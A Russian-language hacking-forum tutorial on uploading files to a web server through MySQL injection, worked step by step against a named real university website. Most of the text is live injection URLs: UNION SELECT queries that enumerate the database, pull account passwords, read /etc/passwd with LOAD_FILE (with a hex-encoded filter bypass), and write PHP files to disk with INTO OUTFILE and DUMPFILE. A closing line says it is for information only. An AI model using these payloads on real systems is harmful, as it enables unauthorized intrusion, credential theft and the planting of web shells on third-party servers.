Загрузка файл через mysql inj.

[Vortex777]

Загрузка файл через mysql inj.​

[INTRO]
Думаю будет полезно новичкам и тем у кого не было практики в этом вопросе. Статья узко направленная, поэтому маленькая по обьему. Побудило меня написать большое кол-во вопросов в icq. Тема Много где обсуждалась но нечего кроме теоритеческих данных не было сегодня мы полностью раскроем этот вопрос и протестим все на конкретном примере.

[хек-хек]
И так начнем.
Наш подопытный:

research.udmercy.edu

Есть SQL:

http://research.udmercy.edu/ids/technoclass.php?id=6+union+select+1,2,3,4,5,6/*

Смотрим user() version() database()

http://research.udmercy.edu/ids/technoclass.php?id=99+union+select+1,2,user(),4,5,6/*

http://research.udmercy.edu/ids/technoclass.php?id=99+union+select+1,2,version(),4,5,6/*

http://research.udmercy.edu/ids/technoclass.php?id=99+union+select+1,2,database(),4,5,6/*

Версия 5 смотрим Какие таблицы есть.

http://research.udmercy.edu/ids/tec...name,3,4,5,6+from+INFORMATION_SCHEMA.TABLES/*

Тестовый вывод данных из бд.

http://research.udmercy.edu/ids/tec...),password),3,4,5,6+from+accounts+limit+1,2/*

Проверяем на чтение файлов.

http://research.udmercy.edu/ids/tec...N+SELECT+1,2,LOAD_FILE('/etc/passwd'),4,5,6/*

C обходом фильтрации (Сдесь не требуеться.)

http://research.udmercy.edu/ids/tec...2,LOAD_FILE(0x2f6574632f706173737764),4,5,6/*

Способ №1
Проверям на запись файла общий синтаксис такой:

http://research.udmercy.edu/ids/tec...ull+from+table+into+outfile+'/tmp/file.php'/*

Записываем (Когда будете тестить надо указывать уникальное имя файла, если такой файл уже будет то запись не произайдет. должна вывестись ошибка
Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource). Записываемый в файл текст мы кодируем в 0x+hex сделать это можно тут (http://hack-shop.org.ru/?page=6&ln=ru)

http://research.udmercy.edu/ids/tec...l+from+accounts+into+outfile+'/tmp/aaa.php'/*

Способ №2

http://research.udmercy.edu/ids/tec...TED+BY+''+OPTIONALLY+ENCLOSED+BY+0x74657374/*

Спсоб №3

http://research.udmercy.edu/ids/tec...ON+SELECT+null,0x66726f6d205b2063617368205d20 7768697468206c6f7665202929292929,null,null,null,nu ll+from+accounts+into+dumpfile+'/tmp/aaaaaaaaa11231.php'/*

Проверям записалось ли???

http://research.udmercy.edu/ids/tec...+SELECT+1,2,LOAD_FILE('/tmp/aaa.php'),4,5,6/*

Записалось.

Полный путь до www

/var/www/

Все данные предоставленные в статье предназначены только для ознакомления.